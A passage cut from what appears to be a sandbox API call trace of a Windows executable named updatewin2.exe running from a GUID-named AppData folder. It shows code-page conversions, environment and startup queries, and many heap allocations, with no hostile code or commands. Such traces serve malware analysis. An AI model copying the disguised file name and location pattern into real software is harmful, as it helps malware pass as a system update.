¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x18e968, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0119.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f224, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¿\x0eøM`õ\x18", lpUsedDefaultChar=0x0) returned 256 [0119.375] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x80) returned 0x60a3e8 [0119.375] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x417ca8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin2.exe")) returned 0x5f [0119.375] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0xc8) returned 0x60c478 [0119.375] RtlInitializeSListHead (in: ListHead=0x417bc8 | out: ListHead=0x417bc8) [0119.375] GetLastError () returned 0x0 [0119.376] GetEnvironmentStringsW () returned 0x60c548* [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xaca) returned 0x60d020 [0119.376] FreeEnvironmentStringsW (penv=0x60c548) returned 1 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x98) returned 0x60c548 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x3e) returned 0x60db10 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x6c) returned 0x60c5e8 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x6e) returned 0x60c660 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x78) returned 0x5f1180 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x62) returned 0x60c6d8 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2e) returned 0x5f52d0 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x48) returned 0x60c748 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x28) returned 0x60a470 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x1a) returned 0x60c028 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x4a) returned 0x60c798 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x72) returned 0x5f1200 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x30) returned 0x5f5308 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2e) returned 0x5f5340 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x1c) returned 0x60c050 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0xd2) returned 0x60c7f0 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x7c) returned 0x60c8d0 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x36) returned 0x60c958 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x3a) returned 0x60db58 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x90) returned 0x60c998 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x24) returned 0x60ca30 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x30) returned 0x5f5378 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x36) returned 0x60ca60 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x48) returned 0x60caa0 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x52) returned 0x60caf0 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x3c) returned 0x60dba0 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x82) returned 0x60cb50 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2e) returned 0x5f53b0 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x1e) returned 0x60c078 [0119.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2c) returned 0x5f53e8 [0119.377] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x54) returned 0x60cbe0 [0119.377] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x52) returned 0x60cc40 [0119.377] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2a) returned 0x5f5420 [0119.377] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x3c) returned 0x60dbe8 [0119.377] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x54) returned 0x60cca0 [0119.377] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x24) returned 0x60cd00 [0119.377] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x30) returned 0x5f5458 [0119.377] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x8c) returned 0x60cd30 [0119.377] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d020 | out: hHeap=0x5e0000) returned 1 [0119.377] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x800) returned 0x60cdc8 [0119.378] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0119.378] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402b17) returned 0x404e49 [0119.385] GetStartupInfoW (in: lpStartupInfo=0x18f590 | out: lpStartupInfo=0x18f590*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0119.386] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1423) returned 0x60eaf8 [0119.386] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1423) returned 0x60ff28 [0119.386] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x60c118 [0119.386] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x60d5d0 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x60c140 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x5f5490 [0119.387] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d5d0 | out: hHeap=0x5e0000) returned 1 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x60c168 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x48) returned 0x60d5d0 [0119.387] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5490 | out: hHeap=0x5e0000) returned 1 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x60c190 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x60) returned 0x60d620 [0119.387] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d5d0 | out: hHeap=0x5e0000) returned 1 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x90) returned 0x60d688 [0119.387] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d620 | out: hHeap=0x5e0000) returned 1 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x60c1b8 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xd8) returned 0x60d720 [0119.387] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d688 | out: hHeap=0x5e0000) returned 1 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x60c1e0 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x60c208 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x138) returned 0x60d5d0 [0119.387] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d720 | out: hHeap=0x5e0000) returned 1 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x60c230 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x60c258 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x60c280 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x60c2a8 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c8) returned 0x60d710 [0119.387] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d5d0 | out: hHeap=0x5e0000) returned 1 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x60c2d0 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x60c2f8 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x60c320 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x60c348 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2a0) returned 0x611358 [0119.387] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d710 | out: hHeap=0x5e0000) returned 1 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x60c370 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x60c398 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x60c3c0 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x60c3e8 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x60c410 [0119.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x60c438 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611618 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611640 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x3f0) returned 0x60d5d0 [0119.388] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611358 | out: hHeap=0x5e0000) returned 1 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611668 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611690 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6116b8 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6116e0 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611708 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611730 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611758 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611780 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6117a8 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x5e8) returned 0x611e00 [0119.388] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d5d0 | out: hHeap=0x5e0000) returned 1 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6117d0 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6117f8 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611820 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611848 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611870 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611898 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6118c0 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6118e8 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611910 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611938 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8d0) returned 0x6123f0 [0119.388] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611e00 | out: hHeap=0x5e0000) returned 1 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611960 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611988 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6119b0 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6119d8 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611a00 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611a28 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611a50 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611a78 [0119.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611aa0 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611ac8 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611af0 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611b18 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611b40 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611b68 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611b90 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611bb8 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xd38) returned 0x612cc8 [0119.389] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6123f0 | out: hHeap=0x5e0000) returned 1 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611be0 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611c08 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611c30 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611c58 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611c80 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611ca8 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611cd0 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611cf8 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611d20 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611d48 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611d70 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611d98 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611dc0 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611e18 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611e40 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611e68 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611e90 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611eb8 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611ee0 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611f08 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611f30 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611f58 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611f80 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611fa8 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611fd0 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x611ff8 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612020 [0119.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612048 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x13eb) returned 0x613a08 [0119.390] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612cc8 | out: hHeap=0x5e0000) returned 1 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612070 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612098 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6120c0 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6120e8 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x5f5490 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612110 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612138 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612160 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612188 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6121b0 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6121d8 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612200 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612228 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612250 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612278 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6122a0 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6122c8 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6122f0 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612318 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612340 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612368 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612390 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6123b8 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6123e0 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612408 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612430 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612458 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612480 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6124a8 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6124d0 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6124f8 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612520 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612548 [0119.390] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612570 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612598 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6125c0 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612618 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1dc3) returned 0x614e00 [0119.391] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x613a08 | out: hHeap=0x5e0000) returned 1 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612640 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612668 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612690 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6126b8 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6126e0 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612708 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612730 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612758 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612780 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6127a8 